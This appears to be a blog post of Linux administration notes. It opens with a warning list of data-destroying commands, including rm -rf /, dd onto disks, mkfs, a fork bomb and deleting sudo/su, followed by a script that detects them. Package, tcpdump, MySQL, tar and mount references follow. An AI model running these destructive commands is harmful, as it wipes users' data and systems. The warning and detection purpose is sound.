Linux lethal commands

In this post I will collect all the commands that SHOULD NEVER be executed on Linux. Any of them will cause data loss or corruption, or can freeze or hang a running system.

NEVER RUN THESE COMMANDS IN A LINUX BOX CLI!

Even if somebody on a forum or over IM advises you to do it.

1. Any of these commands will erase everything from your home directory, the root filesystem, or the whole disk:

  • sudo rm -rf /
  • rm -rf .*
  • dd if=/dev/zero of=/dev/sda
  • mkfs.ext3 /dev/hda
  • whatever > /dev/hda
  • cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
  • find -type f -mtime +30 -exec mv {} /dev/null ;
  • mv ~ /dev/null
  • mv / /dev/null

2. These cause a kernel panic or freeze the Linux box:

  • dd if=/dev/random of=/dev/port
  • :(){:|:&};: #also known as fork bomb

3. This one does the same as “rm -rf /”:


4. This one will prevent you from executing commands with root rights:

rm -f /usr/bin/sudo;rm -f /bin/su

If you know any other commands that can damage a running Linux system or pose a fatal problem for system administrators, just comment here so I can update this post. Thanks.
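One way to screen a snippet copied from a forum before running it as root, matching the patterns in lists 1, 2 and 4 above. This is an added example, not part of the original post; `check_cmd`, `scan` and the regular expressions are assumptions made here, and the rename loop in list 1 is not covered.

```sh
#!/bin/sh
# Added example: flag command lines matching the destructive patterns in the
# lists above. The regexes are heuristics written for this example.

matches() { printf '%s\n' "$1" | grep -Eq -- "$2"; }

# Print a reason and return 0 if the line looks destructive, else return 1.
check_cmd() {
    cmd=$1
    disk='/dev/(sd|hd|vd)[a-z]+'      # whole-disk node (no partition number)
    sep='([[:space:];|&]|$)'          # end of an argument
    # Fork bomb: compare with all whitespace removed.
    case $(printf '%s' "$cmd" | tr -d '[:space:]') in
        *':(){:|:&};:'*) echo "fork bomb"; return 0 ;;
    esac
    if matches "$cmd" "rm[[:space:]]+(-[[:alnum:]-]+[[:space:]]+)*(/usr/bin/sudo|/bin/su)$sep"; then
        echo "removes sudo/su"; return 0
    fi
    if matches "$cmd" "rm[[:space:]]+-[[:alpha:]]*[rR][[:alpha:]]*[[:space:]]+(/|/\*|~|\.\*)$sep"; then
        echo "recursive delete of /, ~ or .*"; return 0
    fi
    if matches "$cmd" "dd[[:space:]].*of=($disk|/dev/port)$sep"; then
        echo "dd writes to a raw device"; return 0
    fi
    if matches "$cmd" "mkfs(\.[[:alnum:]]+)?[[:space:]].*$disk$sep"; then
        echo "mkfs on a whole disk"; return 0
    fi
    if matches "$cmd" ">[[:space:]]*$disk$sep"; then
        echo "redirect onto a raw disk"; return 0
    fi
    if matches "$cmd" "mv[[:space:]].*[[:space:]]/dev/null$sep"; then
        echo "mv into /dev/null"; return 0
    fi
    return 1
}

# Read commands on stdin and report the flagged ones with their line number.
scan() {
    n=0
    while IFS= read -r line; do
        n=$((n + 1))
        reason=$(check_cmd "$line") && echo "line $n: $reason: $line"
    done
    return 0
}

# Constructed sample input: a pasted snippet with one destructive line.
printf '%s\n' 'cd /tmp/build' 'make clean' 'dd if=/dev/zero of=/dev/sda' | scan
```

The strings are only passed to grep and never executed, so the script is safe to run on untrusted text.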

Using RPM and dpkg

The /bin/rpm program on Red Hat and derivatives and the /usr/bin/dpkg program on
Debian and derivatives are used to manage packages.
• Remove a package
# rpm -e <package-name>
# dpkg -r <package-name>
• List contents of entire package
# rpm -qvl <package-name.rpm>
# dpkg -c <package-name.deb>
• List all installed packages with info about each
# rpm -qvia
# dpkg -l
• List contents of a package
# rpm -qvpl <package-name.rpm>
# dpkg -c <package-name.deb>
• Print information about a package
# rpm -qpi <package-name.rpm>
# dpkg -I <package-name.deb>
• Verify package characteristics (basic integrity check)
# rpm -Va
# debsums -a
• Determine to which package a file belongs
# rpm -qf </path/to/file>
# dpkg -S </path/to/file>
• Install new package
# rpm -Uvh <package-name.rpm>
# dpkg -i <package-name.deb>

TCPDUMP

Command Line Options

-A Print frame payload in ASCII
-c <count> Exit after capturing count packets
-D List available interfaces
-e Print link-level headers
-F <file> Use file as the filter expression
-G <n> Rotate the dump file every n seconds
-i <iface> Specifies the capture interface
-K Don’t verify TCP checksums
-L List data link types for the interface
-n Don’t convert addresses to names
-p Don’t capture in promiscuous mode
-q Quick output
-r <file> Read packets from file
-s <len> Capture up to len bytes per packet
-S Print absolute TCP sequence numbers
-t Don’t print timestamps
-v[v[v]] Print more verbose output
-w <file> Write captured packets to file
-x Print frame payload in hex
-X Print frame payload in hex and ASCII
-y <type> Specify the data link type
-Z <user> Drop privileges from root to user

Capture Filter Primitives

[src|dst] host <host> Matches a host as the IP source, destination, or either
ether [src|dst] host <ehost> Matches a host as the Ethernet source, destination, or either
gateway host <host> Matches packets which used host as a gateway
[src|dst] net <network>/<len> Matches packets to or from an endpoint residing in network
[tcp|udp] [src|dst] port <port> Matches TCP or UDP packets sent to/from port
[tcp|udp] [src|dst] portrange <p1>-<p2> Matches TCP or UDP packets to/from a port in the given range
less <length> Matches packets less than or equal to length
greater <length> Matches packets greater than or equal to length
(ether|ip|ip6) proto <protocol> Matches an Ethernet, IPv4, or IPv6 protocol
(ether|ip) broadcast Matches Ethernet or IPv4 broadcasts
(ether|ip|ip6) multicast Matches Ethernet, IPv4, or IPv6 multicasts
type (mgt|ctl|data) [subtype <subtype>] Matches 802.11 frames based on type and optional subtype
vlan [<vlan>] Matches 802.1Q frames, optionally with a VLAN ID of vlan
mpls [<label>] Matches MPLS packets, optionally with a label of label
<expr> <relop> <expr> Matches packets by an arbitrary expression

Protocols

ether
fddi
icmp
ip
ip6
link
ppp
radio
rarp
slip
tcp
tr
udp
wlan

TCP Flags

tcp-urg tcp-rst
tcp-ack tcp-syn
tcp-psh tcp-fin

Modifiers

! or not
&& or and
|| or or

Examples

udp dst port not 53               UDP not bound for port 53
host 10.0.0.1 && host 10.0.0.2    Traffic between these hosts
tcp dst port 80 or 8080           Packets to either TCP port

ICMP Types

icmp-echoreply icmp-routeradvert icmp-tstampreply
icmp-unreach icmp-routersolicit icmp-ireq
icmp-sourcequench icmp-timxceed icmp-ireqreply
icmp-redirect icmp-paramprob icmp-maskreq
icmp-echo icmp-tstamp icmp-maskreply

Important MySQL commands: backup, dump, restore

Connect to the MySQL server

mysql -u USERNAME -h 'HOST_IP' -p

Enter the password at the prompt.

mysql> show databases;

mysql> use DATABASE_NAME;

mysql> your query here. 🙂

Dumping a MySQL database to a SQL file

mysqldump -l --opt -u user --password=whateverthepass databasename > /root/file/location/filename.sql

Importing a MySQL dump file

mysql -u user --password=whateverthepass databasename < /root/file/location/filename.sql
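
The dump and import commands above pass the password as an argument, where it can show up in the process list and in shell history. An added example (not from the original post) that moves the credentials into an owner-only option file; `write_client_cnf`, `dump_db` and the file paths are names assumed here.

```sh
#!/bin/sh
# Added example: keep the MySQL password off the command line.

# Write a client option file readable only by its owner.
# The password is read from stdin, so it never appears in argv.
write_client_cnf() {
    cnf=$1
    user=$2
    IFS= read -r pass || [ -n "$pass" ] || return 1
    old_umask=$(umask)
    umask 077                 # new file is created with mode 0600
    rm -f -- "$cnf"           # drop any older copy with wider permissions
    printf '[client]\nuser=%s\npassword="%s"\n' "$user" "$pass" > "$cnf"
    umask "$old_umask"
    unset pass
}

# The dump from this post, with credentials taken from the option file.
# --defaults-extra-file has to be the first option on the command line.
dump_db() {
    mysqldump --defaults-extra-file="$1" -l --opt "$2" > "$3"
}

# Usage with placeholder names (not run here):
#   write_client_cnf "$HOME/.backup.cnf" user < /path/to/secret
#   dump_db "$HOME/.backup.cnf" databasename /root/file/location/filename.sql
```

The same option file works for the import: `mysql --defaults-extra-file=FILE databasename < filename.sql`.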

Copying Entire Folder of Files

# --reply=yes has been removed from GNU cp; cp overwrites without prompting unless -i is in effect
cp -Ru /root/file/location/* /where/it/should/go

Making a tgz archive of an entire folder for FTP export

tar zcf localfolder.tgz localfolder/ 

Copying an entire folder to another server

tar zcf - localfolder/ | ssh 192.1.1.1 "cd folder/to/copy/to && tar zpxvf -"

If you want to extract one file from the .tar.gz file, use:

gzip -dc file.tar.gz | tar xf - pathname/filename

The pathname and filename must be exactly as given in the .tar.gz file. If you want more than one file, append their names, again including the pathname, at the end of the command.

Printing linux commands

/etc/rc.d/init.d/lpd start     Start the print daemon
/etc/rc.d/init.d/lpd stop      Stop the print daemon
/etc/rc.d/init.d/lpd status    Display status of the print daemon
lpq                            Display jobs in print queue
lprm                           Remove jobs from queue
lpr                            Print a file
lpc                            Printer control tool
man subject | lpr              Print the manual page called subject as plain text
man -t subject | lpr           Print the manual page called subject as Postscript output
printtool                      Start X printer setup interface

Configuration files and what they do

/etc/profile           System-wide environment variables for all users.
/etc/fstab             List of devices and their associated mount points. Edit this file to add cdroms, DOS partitions and floppy drives at startup.
/etc/motd              Message of the day broadcast to all users at login.
/etc/rc.d/rc.local     Bash script that is executed at the end of login process. Similar to autoexec.bat in DOS.
/etc/HOSTNAME          Contains full hostname including domain.
/etc/cron.*            There are 4 directories that automatically execute all scripts within the directory at intervals of hour, day, week or month.
/etc/hosts             A list of all known host names and IP addresses on the machine.
/etc/httpd/conf        Parameters for the Apache web server.
/etc/inittab           Specifies the run level that the machine should boot into.
/etc/resolv.conf       Defines IP addresses of DNS servers.
/etc/smb.conf          Config file for the SAMBA server. Allows file and print sharing with Microsoft clients.
/etc/X11/XF86Config    Config file for X-Windows.
~/.xinitrc             Defines the windows manager loaded by X. ~ refers to user’s home directory.

Installing software for Linux

rpm -ihv name.rpm         Install the rpm package called name
rpm -Uhv name.rpm         Upgrade the rpm package called name
rpm -e package            Delete the rpm package called package
rpm -l package            List the files in the package called package
rpm -ql package           List the files and state the installed version of the package called package
rpm -i --force package    Reinstall the rpm package called name having deleted parts of it (not deleting using rpm -e)
tar -zxvf archive.tar.gz or tar -zxvf archive.tgz    Decompress the files contained in the zipped and tarred archive called archive
./configure               Execute the script preparing the installed files for compiling

Accessing & mounting file systems

mount -t iso9660 /dev/cdrom /mnt/cdrom    Mount the device cdrom and call it cdrom under the /mnt directory
mount -t msdos /dev/hdd /mnt/ddrive       Mount hard disk “d” as a msdos file system and call it ddrive under the /mnt directory
mount -t vfat /dev/hda1 /mnt/cdrive       Mount hard disk “a” as a VFAT file system and call it cdrive under the /mnt directory
umount /mnt/cdrom                         Unmount the cdrom

Linux machine Starting, Stopping and restart

shutdown -h now       Shutdown the system now and do not reboot
halt                  Stop all processes – same as above
shutdown -r 5         Shutdown the system in 5 minutes and reboot
shutdown -r now       Shutdown the system now and reboot
shutdown -r -F now    Force fsck on reboot
shutdown -r -f now    Skip fsck on reboot
reboot                Stop all processes and then reboot – same as above
startx                Start the X system